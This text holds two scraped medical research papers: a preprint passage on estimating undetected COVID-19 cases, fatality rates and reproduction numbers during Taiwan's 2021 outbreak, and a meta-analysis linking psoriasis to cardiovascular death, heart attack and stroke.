To obtain the best model, the variables in equation 5 were added to the model iteratively. First, 169 model fit was measured for each of the variables separately using the Akaike information 170 criterion (AIC) 13 . The model containing the lowest AIC value was selected as the best model 171 candidate in this batch. Next, we added one additional variable to the candidate model from 172 the remaining four variables in the next batch. Among the two-variable models, the model with 173 the lowest AIC value was selected as the best model candidate again. We obtained the best 174 model candidates among three-variable, four-variable and full models. The final best model 175 was obtained by comparing the best model candidates in different batches with the lowest AIC. 176
Model validation 177
To evaluate whether the predictive model achieved its intended purpose (i.e., to improve the 178 accuracy of epidemiological parameter estimation), we explored the relationship between ! 179 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint estimated from the total cases predicted by the best model and daily mobility data. Cases 180 were back-projected to infection time. The result was compared with ! estimated using total 181 cases that were empirically derived or using reported cases. ! estimated from four scenarios 182 of infections were compared: 183 The mean incubation time for the circulated strain in Taiwan was 3.53 days 17 , and we estimated 201 the mean reporting delay as 4.45 days. Assuming the standard deviations were equal for both 202 the distributions (estimated as 3.93 days for the reporting delay), the distribution of time 203 between infection and reporting was gamma distribution with a mean of 7.98 days and a 204 standard deviation of 5.28 days. The mean of the distribution was estimated as the sum of mean 205 incubation time and confirmation delay. In contrast, the standard deviation was obtained from 206 weighted means and pooled standard deviation for the period between infection and reporting 207 using the following formula: 208 where, -and / are mean incubation time and confirmation delay and 8 refers weighted 210 mean of these two. *++$)# represents the pooled standard deviation for the period between 211 infection and reporting. 212 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint We then estimated total cases at infection time using the empirical detection ratio (S1) and the 213 model-predicted detection ratio (S2), and reported cases at infection time (S3) using a back-214 projection method 12 . 215 We set initial conditions for estimating ! . Before May 11, we assumed that there were 15 216 cases each day between May 6 and 10, which was the average number of reported cases at 217 infection time during this 5-day period. 218 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint
Results 219
Time-varying FR among true total cases (equation 4) was first quantified after taking into 220 account undetected cases and was compared with that of reported cases. The number of total 221 cases was also predicted using polymerase chain reaction (PCR) testing data (equations 5 and 222 6). To assess the impact of including undetected cases, we investigated the relationship between 223 ! generated using total cases and mobility data and then determined whether the relationship 224 improved, compared with ! from reported cases. 225 After the number of undetected cases was considered, the estimated FR was lower than using 226 reported cases but was still high during the initial period of the outbreak. The mean FR of total 227 cases was estimated to be 4.7%, which was lower than the mean FR of 5.3% for reported cases 228 ( Figure 1B). The FR increased rapidly from 4.7% and peaked at 6.5% on May 19, but then 229 continued decreasing, reaching 2.8% on June 6. Since then, the rate was generally maintained. 230 From May 24 to June 3, the 5-day moving average numbers of reported cases reached a plateau 231 and then declined thereafter ( Figure 3A). The estimated true daily case number at the peak of 232 the outbreak on May 22 was 897, which was 24.3% higher than the reported number. The 233 difference became less than 4% on June 9 and afterward. 234 Until June 20, a total of 105 late-detected cases were reported, indicating many undetected 235 deaths. Similarly, daily detected deaths also reached a plateau around May 24 ( Figure 3B). 236 However, the number of late-detected cases (at adjusted reporting time), reached a peak (7 237 persons per day) on May 21 and started to decline immediately, approaching zero after June 8. 238 This indicated the improvement of the detected ratio among deaths. The detection ratio among 239 deaths, which was about 50% initially, exceeded 95% after the end of May ( Figure S1B). This 240 ratio was very different from the observed ratio (a V-shaped pattern) without back-projection 241 ( Figure S1A). 242
Predicting detection ratio using testing data 243
We next investigated whether the improvement in the proportion of detected cases was related 244 to the improved capacity of testing and tracing. The indicators of the capacity were explained 245 by the schematic of individual infection and testing statuses of each case among deaths (for 246 definitions, please refer to Figure 2 and its legend). Depending on the time of testing, the case 247 can be categorized as a detected death ( contact-traced without delay or tested after symptom 248 onset but before death) or an undetected death (tested after death). More efficient contact 249 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint tracing allowed more cases to be traced and tested before symptom onset and was indicated by 250 the proportion of cases without contact tracing delay. This proportion fluctuated between 25% 251 and 75% throughout the study period, with an increasing trend from late May (below 50%) to 252 late June (above 60%) ( Figure 4A). The testing delay gradually increased, from approximately 253 two days to up to 4-6 days, until June 14, a few weeks after the outbreak started to decline 254 ( Figure 4B). The reporting delay from the day of symptom onset ranged mostly between 2.5 255 and 7.5 days ( Figure 4E), whereas the death delay continued increasing from 5 days to more 256 than 18 days ( Figure 4C). The ratio of the number of tests conducted to reported cases 257 increased from less than 50 to more than 200 ( Figure 4D), demonstrating the improvement in 258 testing capacity throughout the outbreak. 259 We compared models starting from the most basic to more complex ones by their AIC values 260 to identify the best-fitting model. The model with the predictor, i.e., the proportion of cases 261 without contact tracing delay and the ratio of tests conducted to reported cases, was selected as 262 the best model (Model 2 in Table 1). 263 The model successfully captured the trend in the proportion of detected deaths ( Figure 4F). 20 264 out of 34 daily values were successfully predicted within the confidence interval. Among the 265 values outside the interval, most of the them were in the near distance; only two dots have 266 errors larger than two times the intervals. 267 The results suggest that a higher detection ratio among deaths was driven by more cases who 268 were contact-traced without delay and a higher number of tests conducted relative to the 269 number of cases (Table 2). 270
Comparing effective reproduction number and mobility index 271
Comparisons were made between ! estimated using i) total cases that were estimated using 272 the empirical detection ratio; ii) total cases that were estimated from the model-predicted 273 detection ratio using testing data; and iii) reported cases only (see Figure 5A, B, Figure S2 and 274 Methods). When the total case number was used, ! was higher during the earlier dates. The 275 number reached a maximum value of 6.4 on May 11, compared to 6.0 estimated using the 276 reported case number. We further evaluated the relationship between ! and mobility data 277 during the period when ! reduced from the maximum value to 1 (May 11 to May 24) (Table 278 S1). We found that when the total case number was used (either estimated using the empirical 279 detection ratio or predicted using the testing data), a lower AIC was produced, indicating a 280 better fit to the mobility data. 281 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, In summary, efficiencies of testing and contact tracing changed during the outbreak and were 282 useful in predicting the proportion of undetected cases. After adding the undetected cases, a 283 better estimate of ! was made and a reduction in the FR was observed. 284 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, Understanding whether a high FR observed in the recent largest COVID-19 outbreak in Taiwan 286 was attributed to a higher number of undetected cases or insufficient health care capacity is 287 important to guide interventions to reduce COVID-19 mortality in the future. An important 288 observation is that even though the proportion of undetected cases was included, the average 289 FR was only adjusted to 4.7% from 5.3%, which is still higher than the global average for the 290 same time (i.e., 2.1% in May and June 2021 5 ). However, the daily FR reduced to 2.8% on June 291 6 and remained at this low level, similar to that in the United States (i.e., 2.8% in May and June 292 2021 18 ). The reduction from the initially high FR can be explained by the improvement in 293 hospital capacity or treatment to accommodate the sudden rise in cases. This is supported by 294 the observation that the duration between symptom onset and death among detected deaths 295 continued increasing from approximately five days to more than two weeks in June. 296 The number of hidden (undetected) COVID-19 cases often affects the estimation of 297 transmissibility of the virus and the effectiveness of non-pharmaceutical interventions (NPIs) 298 implemented. Even though the effects of contact tracing and testing on transmissibility have 299 been studied 19,20 , how many hidden cases do they cause is unclear. We demonstrated that the 300 time-varying detection ratios can be predicted using data on testing and contact tracing. As a 301 result, a more accurate ! can be obtained, which is likely to be explained by mobility data 302 better. The guidance for implementing NPIs based on changes in mobility can be provided 8 . 303 We found that the ratio of the number of tests conducted to reported cases, and the proportion 304 of cases that are contact traced without delay can be used to "nowcast" the proportion of 305 undetected cases. Because the number of tested samples can quickly reach the capacity limit 306 when the case number is growing, many samples remain untested. Hence, each day, the number 307 of confirmed cases depends largely on how many tests can be performed. A day delay in testing 308 and confirming a case, leads to a day delay in tracing the close contacts of the case. Further 309 more, a higher contact tracing coverage together with a shorter delay of being traced enables 310 more cases to be identified earlier 19,20 . These suggest increasing testing and tracing capacity to 311 identify those infections earlier can reduce hidden cases more. 312 Modelling has been used to estimate the proportion of undetected COVID-19 cases using the 313 observed case number during a specific period (e.g., before or after an intervention) of an 314 outbreak 21,22 . More recently, an approach through estimating under-ascertainment by directly 315 comparing model-predicted death with excess deaths recorded was used 23 . We checked the 316 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint number of deaths related to flu and pneumonia illness 9 and found no unusual excess deaths 317 other than the reported COVID-19 deaths during this period. The proportion of undetected 318 cases can also be calculated after incorporating seroprevalence data with false negative rates 319 of tests into models 24 . Overall, none of these methods estimate the constantly changing 320 proportion of undetected cases. 321 Several criteria enabled us to make successful prediction using testing data. First, the number 322 of deaths should be high. If this number is low, the uncertainty of estimating the number of 323 undetected cases becomes high. Second, most of the deaths have to be tested eventually. 324 Taiwan government has a strong directive to test all sudden death cases; for example, on June 325 18, it was announced that PCR tests would be performed for all sudden and unexplained deaths 326 25 . This may not likely be the case in countries with a large number of excess deaths associated 327 with COVID-19. 328 In summary, predicting the number of undetected cases as early as possible using testing data 329 can help obtain an ! with a better relationship with mobility data, thus enabling policymakers 330 to make timely public health decisions using mobility information to contain the outbreak. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, and its application to aids data. Stat. Med. 10, 1527-1542 (1991). this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, cases (4.7%). Note that the FR of the total cases was higher than that of the reported cases in 419 the first few days because "# was assumed to be same as the mean # between May 11 420 and May 26. Data points during the earliest dates when the number of detected or undetected 421 cases was zero are not shown. 422 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. infected case was categorized as Detected if the first testing was performed before death. A 428 case that was tested on the same date of or after death was categorized as Undetected. Among 429 detected cases, we assumed that a case was contact traced without delay if the first testwas 430 performed before symptom onset ; otherwise, contact traced with delay or not contact traced 431 if thewas performed after symptom onset. Testing delay refers to the time between symptom 432 onset and the last test 9 . Similarly, the reporting delay and death delay are defined as the time 433 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint difference between symptom onset and reporting, , and death, , respectively. The reporting 434 time among an undetected death was adjusted to an earlier time to have the same reporting 435 delay as detected deaths. The definitions for each status, , , -, 9 , and D, are listed in the 436 text box. (B) Estimation of total number of COVID-19 cases (sum of detected and 437 undetected) using a regression model. With the best-fitting model (see Table 2), we estimated 438 the percentage of deaths that are detected, ( ). Undetected proportion of cases was estimated 439 based on the relationship between ( ) and fatality rates (see equation 6). Gray dashed lines 440 represent the predictors that were not included in the best-fitting model while estimating ( ). 441 reuse, remix, or adapt this material for any purpose without crediting the original authors. The daily number of new infections was back-projected from the daily number of cases 469 obtained from the detected and empirically estimated undetected cases (green dots; referred to 470 as S1 reporting time (red dots; referred to as S4) is presented in Figure S2. 20 is given in Figure S4. Color codes represent the same definition as in (A). The shaded area 482 represents 95% confidence intervals. 483 484 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, detected deaths among total deaths estimated using the empirical detection ratio. In each plot, 512 dots represent daily numbers that are observed or estimated. Solid lines represent moving 513 average using a 5-day sliding window, centered at day 3. 514 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. Figure S4D. 522 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. for gamma distribution with mean and standard deviation 12.7 and 5.3 days, respectively. 532 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint 533 Figure S4. Effective reproduction number ! during the entire period between May 6 and June 534 20. S1 and S2 refer to the numbers of total cases at infection time. S3 and S4 refer to the 535 numbers of reported cases at infection and reporting time, respectively. Smooth solid lines 536 represent the estimated mean ! , and shaded regions show the 95% confidence intervals.The 537 dashed line depicts the cutoff value when ! = 1. 538 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, Table S1. Validation of the estimates of instantaneous reproduction number using mobility 541 adjusted regression model between May 11 and May 24 when ! reached one. The moving 542 average of mobility using a 7-day sliding window, centered at day 4, was considered as the 543 predictor. AIC represents the Akaike information criterion. Δ shows the differences 544 between the smallest AIC and AIC of the ith model. We rechecked the values for an extended 545 period until May 27, when ! reached a minimum. In this case, ! , estimated under scenario 546 S1, showed the best fit of the mobility data with minimum AIC -27.93 (data is not presented 547 in this table), whereas scenario S2 was treated as the second-best with AIC -27.20. The 548 difference between the AIC of these two scenarios was less than one. 549
Date
Type of data estimated from this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint | 2021-10-30T19:07:11.201Z | 2021-10-30T00:00:00.000 | {
"year": 2021,
"sha1": "012f19e1de2825d2043e9ce53ee93136d7e85520",
"oa_license": "CC0",
"oa_url": "https://www.medrxiv.org/content/medrxiv/early/2021/10/30/2021.10.29.21265691.full.pdf",
"oa_status": "GREEN",
"pdf_src": "Anansi",
"pdf_hash": "aafbdc2ca41a632b64d8bb3505780900194585e3",
"s2fieldsofstudy": [
"Medicine",
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
15085663 | pes2o/s2orc | v3-fos-license | Psoriasis and Major Adverse Cardiovascular Events: A Systematic Review and Meta‐Analysis of Observational Studies
Background Psoriasis is a chronic inflammatory disease that may be associated with increased risk of cardiovascular events, including cardiovascular mortality, myocardial infarction, and stroke. Methods and Results We searched the MEDLINE, EMBASE, and Cochrane Central Register databases for relevant studies in English between January 1, 1980, and January 1, 2012. Extraction was by 3 independent reviewers. Summary incidence, risk ratios (RRs), and confidence intervals (CIs) were calculated using fixed‐effects and random‐effects modeling. Meta‐regression was also performed to identify sources of between‐study variation. Nine studies were included, representing a total of 201 239 patients with mild and 17 415 patients with severe psoriasis. The level of covariate adjustment varied among studies, leading to the possibility of residual confounding. Using the available adjusted effect sizes, mild psoriasis remained associated with a significantly increased risk of myocardial infarction (RR, 1.29; 95% CI, 1.02 to 1.63) and stroke (RR, 1.12; 95% CI, 1.08 to 1.16). Severe psoriasis was associated with a significantly increased risk of cardiovascular mortality (RR, 1.39; 95% CI, 1.11 to 1.74), myocardial infarction (RR, 1.70; 95% CI, 1.32 to 2.18), and stroke (RR, 1.56 95% CI, 1.32 to 1.84). Based on these risk ratios and the background population event rates, psoriasis is associated with an estimated excess of 11 500 (95% CI, 1169 to 24 407) major adverse cardiovascular events each year. Conclusions Mild and severe psoriasis are associated with an increased risk of myocardial infarction and stroke. Severe psoriasis is also associated with an increased risk of cardiovascular mortality. Future studies should include more complete covariate adjustment and characterization of psoriasis severity.
Patients with psoriasis may also have an increased risk of major adverse cardiovascular events (MACE) beyond that attributable to measured cardiovascular risk factors. 9 In support of this theory, large epidemiologic studies have found increased rates of cardiovascular mortality, myocardial infarction (MI), and stroke among patients with both mild and severe psoriasis. [10][11][12] Shared inflammatory pathways, including TH1-mediated inflammation, alterations in angiogenesis, and endothelial dysfunction, may link the pathogenesis of psoriasis with the development of atherosclerosis and cardiovascular disease. 13,14 However, the magnitude of this association remains controversial, and it is uncertain whether the increased risk for MACE is limited only to patients with severe psoriasis.
To answer these questions, we performed a systematic review and meta-analysis of the association between psoriasis and cardiovascular death, MI, and stroke. We stratified our analysis by mild versus severe psoriasis and included adjusted risk estimates accounting for comorbidities. Based on these results, we also estimated the attributable risk of psoriasis to excess major adverse cardiovascular events in the US population.
Selection of Studies
We systematically searched the MEDLINE, EMBASE, and Cochrane Central Register databases with the following search terms: "Psoriasis" [ Our search was limited to English-language and human-only studies published between January 1, 1980, and January 1, 2012. The search yielded 558 results. All abstracts were read to determine eligibility for inclusion in the systematic review. To be included, original studies needed to fulfill the following inclusion criteria: case-control, cross-sectional, cohort, or nested case-control design; evaluation of MI, stroke, cardiovascular death, or composite cardiovascular end point in conjunction with psoriasis; and analyses that compared psoriasis patients with control groups. The studies had to evaluate the incidence of subsequent cardiovascular death, MI, or stroke, with these 3 entities defined as overall MACE. The end point could be identified by physical examination, patient self-report, medical chart review, or medical billing codes. A number of studies assessed MI or stroke prevalence but not incidence. These studies are detailed in Tables S1 and S2 but were not included in the analysis because they did not assess incidence.
Data Extraction and Clinical Endpoints
The Meta-Analysis of Observational Studies in Epidemiology (MOOSE) guidelines were used to guide analysis. 15 The systematic review and data extraction were performed independently by 3 reviewers (E.J.A., C.T.H., and A.W.A.), and any differences were adjudicated by consensus. For each study included, we recorded the study year, country in which the study population lived, setting in which the study took place, study design, numbers of case and control subjects, age, sex, statistical adjustments for comorbidities, data collection processes (prospective versus retrospective), whether the results were a primary or secondary analysis of the publication, and whether psoriasis disease severity was assessed. A previously validated 6-point scale was used to determine study quality, with values of 0 or 1 assigned to study design, assessment of exposure (psoriasis), assessment of outcome (major adverse cardiovascular events), control for confounding, evidence of bias, and assessment of psoriasis severity. Studies with a score of 0 to 3 were categorized as lower quality, whereas studies with scores of 4 to 6 were categorized as higher quality. 16 Most of the included studies were of either case-control or cohort design. One study assessed the combined outcome of MACE. 9 All others assessed MI, stroke, or cardiovascular death independently.
Statistical Analysis
Because prior studies have suggested a significant effect modification of psoriasis severity on cardiovascular outcomes, we stratified our analysis on the basis of patients with mild psoriasis versus patients with severe psoriasis. To estimate the pooled risk ratio (RR), the adjusted effect size and reported upper and lower bounds of the 95% confidence interval for each study were log-transformed. The inverse variance method was then applied with fixed-effects and random-effects models of DerSimonian and Laird. 17 Study heterogeneity was assessed using the I 2 statistic.
Risk ratios were used to calculate the excess risk for cardiovascular mortality, MI, and stroke among patients with psoriasis. Because 2 studies used standardized mortality ratios based on a population sample, we assumed that the control groups in each case consisted of an equal number of patients matched by age and sex with the same duration of follow-up as the psoriasis group. 18,19 In cases in which the total number of patient-years of follow-up was not reported, we integrated the mean of the aggregate data. 18 In another study, the total patient-years of follow-up were available, but the total number of events was not reported. 20 We therefore estimated the number of events on the basis of the size of the cohort and the reported events/1000 patient-years.
Publication bias was assessed using visual inspection of a funnel plot of study size versus standard error, with formal statistical testing using the Begg adjusted rank correlation test. 21,22 To explore sources of study heterogeneity, we performed meta-regression using prespecified variables and fixed-effects meta-analysis. Prespecified sources of heterogeneity included study country, subject location (ambulatory or inpatient), multivariate adjustment for confounders, prospective versus retrospective study design, primary versus secondary analysis, ascertainment of psoriasis disease severity, measure of outcome, and study quality (0 to 3 versus 4 to 6).
To calculate the population attributable risk of psoriasis on major adverse cardiovascular events, we used the most current statistics from the American Heart Association, 23 which are based on 2008 US census data. 24 We assumed that a total of 7.5 million people in the United States have psoriasis, and that 10% of patients with psoriasis have severe psoriasis. 25 All analyses were performed using STATA Version 11.2 (STATA Corp, College Station, TX). All statistical tests were 2 sided, with a significance level of <0.05.
Study Selection
From the initial 558 search results, 108 full-text articles were chosen for further review. Among these full-text articles, 26 studies were excluded because they were reviews; 20 were letters, commentaries, or case reports; 12 exclusively assessed psoriatic arthritis (PsA) patients; 15 assessed cardiovascular risk factors only; 13 did not measure the association between psoriasis and MACE; 6 were of the same cohort as prior studies; and 7 assessed prevalence of MI or stroke but not incidence (Tables S1 and S2). [26][27][28][29][30][31][32] Nine studies were therefore included in the meta-analysis ( Figure 1). 11,12,[18][19][20][33][34][35][36] Studies with significant cohort overlap (eg, in which multiple studies used the General Practice Research Database [GPRD] in overlapping periods) were included only once. 9,10,[37][38][39] In each case, the study with the highest-quality measure and most complete reporting was included.
The baseline characteristics of each study, stratified by mild versus severe psoriasis, are shown in Tables 1 and 2. Two studies used standardized mortality ratios based on the expected mortality among patients matched for age and sex, 18,19,37 whereas other studies used hazard ratios or rate ratios. Study designs included nested case-control, isolated cohorts based on practice patterns, or whole-country cohort design. All studies except 1 differentiated mild from severe psoriasis, as defined by either inpatient status, need for phototherapy, or use of systemic medications. 34
Quality of the Studies and Publication Bias
All studies were observational and included sufficient followup to determine the end point of interest. All studies were deemed high quality (score of 4 or greater) using a prespecified 6-point quality scale. Variable levels of covariate adjustment were performed (Tables 1 and 2), with all studies adjusting for age and sex, but only some studies including full adjustment for other medical comorbidities. The studies of cardiovascular mortality adjusted only for age, sex, and some medical comorbidities, whereas studies of myocardial infarction and stroke in general included more complete covariate adjustment. No evidence of publication bias was detected for cardiovascular mortality (P=0.7), MI (P=0.5), or stroke (P=0.9) using visual inspection of a funnel plot and formal testing with the Egger test.
Because observational studies may also have significant between-study heterogeneity in design and cohort selection, we also performed meta-regression analysis for the end points of cardiovascular mortality and MI (CV death in mild psoriasis and stroke were not included in meta-regression testing because of identification of only 2 studies for each of these analysis subgroups and no significant between-study heterogeneity). There was an association between study country and the strength of association of severe psoriasis with cardiovascular mortality (P=0.01), largely because the 1 US-based study of cardiovascular mortality had a smaller reported RR than the other, European-based studies. 19 All other prespecified meta-regression analyses were not statistically significant (Tables S3 through S5).
Cardiovascular Mortality
Cardiovascular mortality was studied among 4 cohorts, including patients from the United States, United Kingdom, Sweden, and Denmark ( Figure 2). A total of 54 128 patients with mild psoriasis were studied. Only 2 studies addressed cardiovascular mortality among patients with mild psoriasis. The 2 studies had discordant findings, leading to no statistically significant association (RR, 1.03; 95% CI, 0.86 to 1.25) on meta-analysis.
Among 16 591 patients with severe psoriasis, there was a significantly increased risk of cardiovascular mortality during long-term follow-up ranging from 2.7 to 22.4 years (RR, 1.39; 95% CI, 1.11 to 1.74). Discordant outcomes between the European-based and US-based studies accounted for all the between-study heterogeneity (I 2 =91.1% before exclusion, I 2 =0 after exclusion). If the meta-analysis was restricted to the 3 European-based studies, the RR for cardiovascular mortality among patients with severe psoriasis increased to 1.53 (95% CI, 1.45 to 1.60). The incidence rate per 1000 person-years for cardiovascular mortality among patients with severe psoriasis ranged from 3.1 to 16.2 ( Table 2).
Myocardial Infarction
Myocardial infarction was studied among 4 cohorts (Figure 3). There was a significantly increased risk of MI among patients Stroke Two studies assessed the risk of incident stroke among patients with psoriasis ( Figure 4). Among 165 908 patients with mild psoriasis, the RR for stroke was 1.12 (95% CI, 1.08 to 1.16). Among 6396 patients with severe psoriasis, the RR for stroke was 1.56 (95% CI, 1.32 to 1.84). Both these studies were derived from large European-based cohorts and use of medical codes. In 1 study, patients with psoriasis were identified on the basis of medical prescriptions, and the analysis only included treated patients. 36 The incidence rate per 1000 person-years for stroke ranged from 3.7 to 5.0 for patients with mild psoriasis and from 6.1 to 6.8 for patients with severe psoriasis.
Attributable Risk Estimate of Psoriasis
Using the most current background rates of cardiovascular mortality, myocardial infarction, and stroke in the US population, we calculated the population attributable risk of psoriasis on major adverse cardiovascular events (Table 3). On the basis of these estimates and pooling results from patients with mild and severe psoriasis, psoriasis in the United States is associated with an estimated 1269 (95% CI, À2208 to 5741) excess deaths from cardiovascular causes, 6479 (95% CI, 979 to 13 409) excess MIs, and 3782 (95% CI, 2399 to 5258) excess strokes each year, for an estimated total of >11 500 (95% CI, 1169 to 24 407) excess major adverse cardiovascular events each year.
Discussion
The association between psoriasis and cardiovascular disease has gained increased attention in the past 5 years. Although psoriasis was once thought to be a disease limited to the skin, there is increasing awareness that patients with psoriasis have a number of associated medical comorbidities. These comorbidities may significantly affect quality of life and also place patients with psoriasis at higher risk of subsequent medical problems. Although many of the initial studies examining psoriasis and comorbidities assessed only the prevalence of risk factors, a number of recent cohort studies have assessed incident cardiovascular events among patients with psoriasis. In this meta-analysis, we systematically assessed the incidence of MACE among patients with psoriasis to better understand the magnitude of this association and the additional contribution of psoriasis to cardiovascular disease. In our analysis, we found that both mild and severe psoriasis were associated with significantly increased risk of MI and stroke. In addition, severe psoriasis was associated with significantly increased cardiovascular mortality. The strength of the association for MI and stroke was greater for severe than for mild psoriasis, further supporting a possible dose-response relationship between disease severity and the excess risk of cardiovascular disease. On the basis of the pooled risk ratios for mild and severe psoriasis, we estimated that psoriasis accounts for an additional approximately 11 000 major adverse cardiovascular events/year in the United States. Although the relative risk of MACE is greater for patients with severe compared with mild psoriasis, the greater population prevalence of mild psoriasis actually translates into a greater population attributable risk of mild psoriasis for both MI and stroke. These findings emphasize that all patients with psoriasis, rather than only those with severe psoriasis, should be educated regarding an increased risk of cardiovascular disease.
Prior studies have suggested an age interaction between psoriasis and cardiovascular risk, with younger patients having a significantly higher relative risk for cardiovascular disease than older patients. 11 These risk estimates may reflect the bimodal incidence of psoriasis, with a differential effect of early-onset psoriasis on progression of atherosclerosis. Alternatively, the development of additional cardiovascular risk factors coincident with aging may eventually outweigh the additional risk of psoriasis to cardiovascular disease. However, we recently found that even among older patient cohorts, patients with psoriasis undergoing coronary angiography were more likely to have coronary artery disease. 40 Although we could not adjust in this meta-analysis for an age-dependent effect of psoriasis on cardiovascular outcomes, these findings should be widely applicable to the cohorts studied, in which the mean age ranged from 45 to 52 years of age. This age group represents a common age at which intervention into cardiovascular risk factors can substantially modify future cardiovascular risk.
Currently, no specific treatments exist for modification of cardiovascular risk independent of standard risk factors. In the absence of specific treatments, recognition of modifiable risk factors remains paramount. Recent survey results suggest that most physicians are not aware of the association between psoriasis and cardiovascular disease and that patients with psoriasis are not adequately screened for medical comorbidities. 41,42 Once these modifiable conditions are recognized, aggressive lifestyle modification and medical intervention may be warranted. Recognizing the additional contribution of psoriasis to cardiovascular disease may also result in reclassification of a number of patients from low-or medium risk based on Framingham risk scores to a higher-risk category. 43 It is possible that treatment of psoriasis with systemic medications may independently affect cardiovascular outcomes. Methotrexate, which is commonly prescribed in cases of moderate to severe psoriasis, may reduce the risk of cardiovascular events, although most of this evidence is observational and based on patients with rheumatoid arthritis. 44 TNF-alpha inhibitors are increasingly used in the management of patients with moderate to severe psoriasis. Randomized trials with short duration of follow-up showed no effect of TNF-alpha inhibitors on cardiovascular events. 45 Recently published observational data suggests that TNFalpha inhibitors may be associated with reduced incidence of cardiovascular events among patients with psoriasis. 46 In addition, treatment of psoriasis with TNF-alpha inhibitors may reduce the incidence of diabetes, thereby reducing long-term cardiovascular risk. 47 Although there is some concern that more recent IL 12/23 inhibitors may increase cardiovascular mortality, a recent meta-analysis failed to find any association between these agents and cardiovascular events. 45 Further research will be necessary to better delineate the effect of these systemic medications on cardiovascular events.
This study should be interpreted in the context of its design. First, observational studies have inherent limitations, including unmeasured confounders and between-study heterogeneity. The included studies, however, were all high quality and included effect sizes that were adjusted. Second, a potential major limitation of this analysis is the extent of covariate adjustment performed in each primary study. For example, studies of cardiovascular mortality did not adjust for important covariates, including smoking and diabetes, both of which are known to occur with greater prevalence among patients with psoriasis. It is therefore possible that the apparent independent effect of psoriasis on cardiovascular mortality is partly attributable to incomplete covariate adjustment. The studies of myocardial infarction and stroke utsed more complete covariate adjustment including smoking and diabetes status, but not all these studies adjusted for body mass index, and patients with psoriasis are known to have a higher prevalence of obesity when compared with the general population. These analyses emphasize that future epidemiologic studies should include a more thorough assessment of cardiovascular risk factors among well-defined cohorts of patients with psoriasis. Third, the majority of the studies used billing codes and/or medication prescriptions to identify patients with psoriasis. The study population therefore represents patients with treated psoriasis and may not reflect the entire, often undertreated population of patients with psoriasis. Furthermore, the definition of severe psoriasis varied between studies. Most cohorts identified only 3% to 10% of patients as having severe psoriasis, whereas recent estimates based on percent body surface area involvement suggest that 15% to 20% of patients with psoriasis have a moderate to severe form of the disease. 25 Whether such patients have an intermediate risk profile between that of patients with mild versus severe psoriasis is uncertain. Fourth, the studied cohorts range over the last 1 to 3 decades. A number of new therapies have been developed for psoriasis in the past decade, and it is possible that these therapies have altered the current epidemiology of cardiovascular disease among patients with psoriasis.
In conclusion, this meta-analysis supports a significant association between psoriasis and incidence of major adverse cardiovascular events, with a significant population attributable risk of psoriasis. Patients with psoriasis should be educated regarding the increased risk of cardiovascular disease and aggressively treated for modifiable cardiovascular risk factors. Further research into the mechanisms linking psoriasis with cardiovascular disease is warranted and may provide insights into both pathogenesis and treatment.
Disclosures
Dr Ehrin Armstrong and Dr Harskamp have no disclosures. Dr April Armstrong has served as an investigator for and an advisor to AbbVie, Amgen, Janssen, Ely Lilly, Merck, and Pfizer. | 2017-04-06T00:01:52.842Z | 2013-04-01T00:00:00.000 | {
"year": 2013,
"sha1": "8d05aa62a247a2f38b75f86d404cc72f05080e06",
"oa_license": "CCBY",
"oa_url": "https://www.ahajournals.org/doi/pdf/10.1161/JAHA.113.000062",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
